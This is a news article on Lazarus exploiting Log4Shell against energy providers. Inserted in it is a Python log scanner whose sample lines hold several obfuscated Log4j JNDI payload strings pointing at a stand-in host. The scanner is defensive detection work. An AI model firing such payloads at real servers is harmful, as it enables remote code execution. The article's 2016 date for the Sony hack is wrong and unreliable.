
North Korea's Lazarus hackers are exploiting Log4j flaw to hack US energy companies • TechCrunch


Sep 22, 2022

Security researchers have linked a new cyber espionage campaign targeting U.S., Canadian and Japanese energy providers to the North Korean state-sponsored Lazarus hacking group.

Threat intelligence company Cisco Talos said Thursday that it has observed Lazarus (also known as APT38) targeting unnamed energy providers in the United States, Canada and Japan between February and July this year. According to Cisco's research, the hackers used a year-old vulnerability in Log4j, known as Log4Shell, to compromise internet-exposed VMware Horizon servers and establish an initial foothold on a victim's enterprise network, before deploying bespoke malware known as "VSingle" and "YamaBot" to establish long-term persistent access. YamaBot was recently attributed to the Lazarus APT by Japan's national cyber emergency response team, known as CERT.
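The initial-access step Talos describes, Log4Shell against internet-exposed VMware Horizon, leaves a recognisable trace in web access logs: a Log4j lookup string of the form `${jndi:<scheme>://...}` in a request header or URL, often URL-encoded or wrapped in nested lookups such as `${lower:j}` so that a naive substring search misses it. The scanner below is an added example written for this page; it is not code from Cisco Talos, TechCrunch or any of the projects mentioned. It assumes Apache-style access logs, and every log line and IP address in it is constructed for the example (the addresses are from the TEST-NET ranges, not real infrastructure).

```python
import re
import urllib.parse

# Constructed sample access-log lines (not taken from the article or any real incident).
# Lines 2-5 carry JNDI lookup strings in the User-Agent or query string, with
# progressively more obfuscation; lines 1 and 6 are benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [21/Jul/2022:10:01:12 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [21/Jul/2022:10:02:44 +0000] "GET /portal/webclient/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [21/Jul/2022:10:03:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.10:1099/b}"',
    '10.0.0.9 - - [21/Jul/2022:10:03:20 +0000] "GET /portal/?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.10%2Fx%7D HTTP/1.1" 200 512 "-" "curl/7.68"',
    '10.0.0.9 - - [21/Jul/2022:10:03:41 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.10:1389/c}"',
    '10.0.0.11 - - [21/Jul/2022:10:04:00 +0000] "GET /docs/jndi-lookup.html HTTP/1.1" 200 2 "-" "kube-probe/1.24"',
]

# ${anything:-default}  ->  default   (Log4j's default-value syntax, e.g. ${::-j} -> j)
DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# ${lower:x} / ${upper:x}  ->  x       (case lookups used to split the word "jndi")
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# The lookup that actually triggers the remote class load; capture the scheme.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):")


def normalize(text: str, max_rounds: int = 5) -> str:
    """Undo URL-encoding and the nested lookups Log4j would resolve before
    performing the JNDI lookup, so the detector sees the effective string.
    Repeats until the text stops changing (bounded to avoid pathological input)."""
    text = text.lower()
    for _ in range(max_rounds):
        new = urllib.parse.unquote(text)
        new = DEFAULT_VALUE.sub(r"\1", new)
        new = CASE_LOOKUP.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text


def scan_line(line: str):
    """Return a finding dict for a line containing a JNDI lookup, else None."""
    norm = normalize(line)
    match = JNDI_LOOKUP.search(norm)
    if not match:
        return None
    return {
        "scheme": match.group(1),                 # ldap, rmi, dns, ...
        "lookup": norm[match.start():match.start() + 80],
        "raw": line,
    }


def scan_logs(lines):
    """Scan an iterable of log lines; keep only the lines that matched."""
    return [hit for hit in (scan_line(line) for line in lines) if hit]


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"[{hit['scheme']}] {hit['lookup']}")
```

Matching on the normalized form rather than the raw line is the point: all four malicious sample lines collapse to the same `${jndi:` prefix once default-value and case lookups are resolved and percent-encoding is removed, while the benign line that merely mentions "jndi" in a path does not match. In practice the same normalization should be applied to every header Log4j might log, not just User-Agent and the query string, and a hit on a Horizon or other Java-facing host is a reason to pull the JVM's outbound connection logs for the period rather than a verdict on its own.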

Details of this espionage campaign were first revealed by Symantec in April this year, which attributed the operation to "Stonefly," another North Korean hacking group that has some overlaps with Lazarus.

However, Cisco Talos also observed a previously unknown remote access trojan, or RAT, named "MagicRAT," attributed to Lazarus Group, which the hackers use for reconnaissance and stealing credentials.

"The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives," wrote Talos researchers Jung soo An, Asheer Malhotra and Vitor Ventura. "This activity aligns with historic Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property."

The Lazarus Group is a financially motivated hacking group backed by the North Korean state that is best known for the high-profile Sony hack in 2016 and the WannaCry ransomware attack in 2017. Lazarus is also driven by efforts to support North Korea's state objectives, including military research and development and evasion of international sanctions.

However, the group has in recent months turned its attention to blockchain and cryptocurrency organizations. It has been linked to the recent theft of $100 million in crypto assets from Harmony's Horizon Bridge, and the theft of $625 million in cryptocurrency from the Ronin Network, an Ethereum-based sidechain made for the popular play-to-earn game Axie Infinity.

Pyongyang has long used stolen cryptocurrency and the theft of other information to fund its nuclear weapons program.

In July, the U.S. government offered a $10 million reward for information on members of state-sponsored North Korean threat groups, including Lazarus, doubling the amount that the U.S. State Department announced in April.
